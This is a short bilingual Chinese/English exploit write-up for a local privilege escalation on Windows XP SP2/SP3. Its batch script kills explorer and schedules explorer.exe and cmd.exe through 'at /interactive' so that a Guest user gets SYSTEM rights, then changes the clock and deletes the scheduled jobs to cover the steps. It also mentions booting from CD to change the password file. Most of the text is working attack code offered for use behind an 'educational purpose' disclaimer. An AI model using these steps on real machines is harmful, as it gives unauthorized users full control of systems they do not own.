仅供教学与研究用,后果自负!
!! USE AT YOUR OWN RISK !!
!! ONLY FOR EDUCATIONAL PURPOSE !!
介绍
获取SYSTEM权限。测试通过。
-
进入Guest账户
假如连Guest账户都没有,那么此方法不适用。可以用光盘启动便携系统,更改密码文件。 -
删除explorer进程:
:l
tskil explorer
goto l
- 建立任务计划:不久后运行explorer
at T /interactive explorer.exe
T代表一段时间后(可以通过通过time.exe获取当前时间)
explorer.exe再次启动后,当前登录账户会变为SYSTEM。
重启后将恢复原状。
Demo
@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
echo [*] Backup time
time < time.txt